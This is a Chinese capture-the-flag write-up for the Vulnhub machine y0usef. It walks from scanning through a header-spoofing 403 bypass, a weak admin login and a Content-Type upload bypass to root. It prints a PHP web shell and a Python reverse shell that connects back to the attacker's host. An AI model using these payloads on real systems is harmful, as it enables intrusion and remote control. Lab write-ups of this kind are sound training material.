Vulnhub靶机-y0usef

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经雷神众测允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。

y0usef

内容简介

环境准备

攻击开始

1.主机发现

arp-scan -l

2.端口扫描

nmap -p- 10.0.2.8

3.服务发现

nmap -p22,80 -sV 10.0.2.8

4.收集信息

80端口开启着web服务，我们直接访问。

通过对页面进行信息收集，并没有发现有用的信息。
查看目标靶机网站架构组成。

whatweb http://10.0.2.8

Apache后端web服务，Bootstrap前端框架，系统是Ubuntu，使用的语言是PHP-5.5.9。
扫描目标靶机的目录。

出现很多403响应码表示拒绝访问，经过测试/index.php和/index.php/login/仍是主页，但是有一个路径/adminstration，尝试访问。

依旧是拒绝访问，说明这个地址是存在的，但是我们的权限很低没有办法访问，这个说明目标靶机的管理员做过权限控制，但是很多时候管理员做的权限控制很存在安全隐患，我们尝试是否可以绕过403授权限制。

5.403 Bypass

burp suite抓包。

修改数据包头部，添加X-Fprwarded-For让目标靶机认为这个请求是来自他自己的请求

成功访问。

6.测试漏洞

我们尝试登录，最终经过测试目标靶机存在弱口令admin，admin，继续burp suite抓包，每一个包都加上X-Forwarded-For: 127.0.0.1，然后forward。

成功进入后台，在后台中我们发现了Upload file，依旧利用burp suite进行访问，进入Upload file页面。

7.文件上传

上传一个shell

<?php $var=shell_exec($_GET['axpmyw']); echo $var ?>

我们直接上传php的shell

发现目标靶机有限制，不允许上传，尝试绕过限制，经过测试当修改Content-Type时可以上传成功。

利用BurpSuite访问。

传入参数。

?axpmyw=id

8.反弹shell

shell成功上传，并且可以利用shell执行命令，查看一下目标靶机有没有python环境。

?axpmyw=which python

有python环境，我们可以利用python反弹shell，脚本如下：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.4",4444));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

开启监听。

反弹shell

成功获取一个shell

升级一下目标靶机的shell

python -c "import pty; pty.spawn('/bin/bash')"

在/home目录下找到一个flag

c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

这一段明显是一串base64编码，尝试解码。

ssh : 
user : yousef 
pass : yousef123

提示ssh的用户名和密码，ssh登录。

通过查看id发现youser账号可以执行sudo命令，而且可以运行这个靶机上的所有程序。

9.权限提升

切换root权限。

在/root目录下发现了第二个flag

WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx

很明显也是base64编码，进行解码。

You've got the root Congratulations any feedback content me twitter @y0usef_11

这是靶机作者的一段留言。

END